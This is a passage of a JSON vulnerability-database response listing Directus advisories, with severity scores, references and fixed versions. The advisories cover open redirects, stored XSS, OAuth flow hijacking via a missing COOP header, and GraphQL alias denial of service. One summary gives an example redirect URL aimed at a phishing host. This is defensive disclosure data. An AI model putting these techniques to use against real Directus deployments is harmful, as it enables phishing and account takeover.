5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1"}],"aliases":["GHSA-q83v-hq3j-4pq3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ua8h-tmak-hufd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/83730?format=json","vulnerability_id":"VCID-ufth-uy5w-87fe","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14642","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14523","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032","reference_id":"CVE-2026-22032","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23","reference_id":"dad9576ea9362905cc4de8028d3877caff36dc23","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23"},{"reference_url":"https://github.com/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3573-4c68-g8cc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36567?format=json","purl":"pkg:npm/directus@11.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0"}],"aliases":["CVE-2026-22032","GHSA-3573-4c68-g8cc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ufth-uy5w-87fe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/173457?format=json","vulnerability_id":"VCID-uhj5-vc26-t3ga","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814","reference_id":"","reference_type":"","scores":[{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.63061","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.62959","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12020","reference_id":"12020","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/pull/12020"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814","reference_id":"CVE-2022-24814","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814"},{"reference_url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"v9.7.0","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/20019?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eb1b-zvas-muey"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-24814","GHSA-xmjj-3c76-5w84"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uhj5-vc26-t3ga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39920?format=json","vulnerability_id":"VCID-v2je-s9mk-e3h1","summary":"Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message \"Your password needs to be updated\" to phish out the current password. Users who login via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.46037","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45892","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203","reference_id":"5477d7d61babd7ffc2f835d399bf79611b15b203","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203"},{"reference_url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers","reference_id":"authentication.html#login-using-sso-providers","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239","reference_id":"CVE-2024-28239","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239"},{"reference_url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29718?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pt9-wpk9-tfhj"},{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28239","GHSA-fr3w-2p22-6w7p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v2je-s9mk-e3h1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90367?format=json","vulnerability_id":"VCID-v6mk-ybv3-tyc8","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 11.13.0 that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13895","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.1378","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747","reference_id":"CVE-2025-64747","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e","reference_id":"d23525317f0780f04aa1fe7a99171a358e43cb2e","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e"},{"reference_url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64747","GHSA-vv2v-pw69-8crf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v6mk-ybv3-tyc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71665?format=json","vulnerability_id":"VCID-v9s1-9n1m-bubs","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00953","published_at":"2026-06-12T12:55:00Z"},{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00955","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408"},{"reference_url":"https://github.com/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m32-p958-jg99"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35408","GHSA-8m32-p958-jg99"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v9s1-9n1m-bubs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359856?format=json","vulnerability_id":"VCID-y6cy-k9c2-pkcb","summary":"Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh"},{"reference_url":"https://github.com/advisories/GHSA-6q22-g298-grjh","reference_id":"GHSA-6q22-g298-grjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6q22-g298-grjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["GHSA-6q22-g298-grjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y6cy-k9c2-pkcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90667?format=json","vulnerability_id":"VCID-ywqb-qrvw-hfbh","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.13.0, 